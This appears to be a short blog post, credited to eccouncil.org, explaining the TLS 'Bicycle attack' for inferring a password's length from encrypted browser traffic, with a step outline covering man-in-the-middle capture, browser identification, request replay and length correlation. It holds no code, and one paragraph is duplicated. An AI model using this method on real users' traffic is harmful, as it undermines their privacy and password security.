It is usually assumed that HTTP traffic encapsulated in TLS doesn’t reveal the exact sizes of its parts, such as the length of a Cookie header, or the payload of a HTTP POST request that may contain variable-length credentials such as passwords.
The Bicycle attack, in the context of obtaining the length of a user's password from a browser request, is fairly simple. All a user needs to do is have a packet capture of requests to a known site, including an authentication (login) request containing an already known username and an unknown plain-text password. If an attacker can determine the user's browser and how that browser would send requests to the site, they can subtract the length of all the known data the browser would send except for the piece of information they are interested in, which will result in them knowing the length of the unknown data.
Summary:
source : eccouncil.org
The Bicycle attack, in the context of obtaining the length of a user's password from a browser request, is fairly simple. All a user needs to do is have a packet capture of requests to a known site, including an authentication (login) request containing an already known username and an unknown plain-text password. If an attacker can determine the user's browser and how that browser would send requests to the site, they can subtract the length of all the known data the browser would send except for the piece of information they are interested in, which will result in them knowing the length of the unknown data.
Summary:
- Obtain a packet capture (i.e.
via a Man-in-the-Middle attack) which hasstream -cipher TLS traffic of encrypted browser requests to a known website, including one where there was likely to be a password sent in an authentication request. The target site may be revealed in the packet capture in the form of a DNS request, or the attacker may be able to find this out with some reconnaissance. - Obtain a "User-Agent" string from the packet capture or determine which browser the target was using.
- Replicate browser requests to the site using the same browser. This will reveal the lengths of the requests
to various pages on the site. - From the encrypted TLS payloads of the browser requests in the packet capture, extract the lengths of the payloads.
- Compare the Pearson correlation coefficient for the plain-text and encrypted requests. This will enable to compare plain-text and encrypted request lengths in order to reveal which encrypted TLS requests are for which pages (URLs) of the website.
No comments:
Post a Comment